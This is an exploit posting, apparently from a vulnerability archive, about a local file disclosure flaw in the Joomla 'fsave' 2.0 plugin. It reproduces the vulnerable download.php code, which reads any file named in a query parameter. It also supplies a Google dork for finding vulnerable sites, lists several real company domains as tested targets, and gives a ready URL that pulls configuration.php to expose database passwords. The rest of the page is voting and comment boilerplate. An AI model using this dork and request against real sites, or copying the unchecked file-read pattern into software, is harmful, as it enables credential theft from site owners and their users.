Joomla Fsave 2.0 Local File Disclosure

2016.01.20

Credit: KnocKout

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

Dork: inurl:plugins/content/fsave/

                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \  
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____ 
                       /_______  //_______  / \______  /
                               \/         \/         \/            
Joomla <= (fsave Plugin) Local File Disclosure Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Skype : knockoutr@msn.com
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Greetz :  b3mb4m, ZoRLu, Sen Haxor, Ne0-h4ck3r, KedAns-Dz ( milw00rm.com )
===================================================================
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Joomla 
|~Plugin : fsave
|~Affected Version : 2.0
|~Software  : N/A
|~RISK : High
|~Google Dork :  inurl:plugins/content/fsave/
===================================================================
======================Info=========================================
can be easily found in any database password for this "configuration.php" will be sufficient to read
possible to read the file on the local database. 
incorrect coding and unconscious in it causing "download.php" file.
that's laughter reason codes:)
============ Error line's in download.php ===========================
<?php

define('JPATH_BASE', dirname(dirname(dirname(dirname(__FILE__)))));

$file = JPATH_BASE."/".$_GET['filename'];

header('Content-Description: File Transfer');
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=".basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header("Content-Length: " . filesize($file));
ob_clean();
flush();
readfile($file);
?>

======================================================================
======================== Tested on Demos  ============================
http://www.gedore.pl
http://www.gedore.com.pl
http://www.rhodius.pl
http://rhodius.com.pl
http://loesomat.pl
http://carolus.com.pl
http://klann.pl
=======================================================================
=========================  Exploitation ====================

http://[TARGET]/plugins/content/fsave/download.php?filename=configuration.php

=======================================================================

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Fsave 2.0 Local File Disclosure

Dork: inurl:plugins/content/fsave/

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.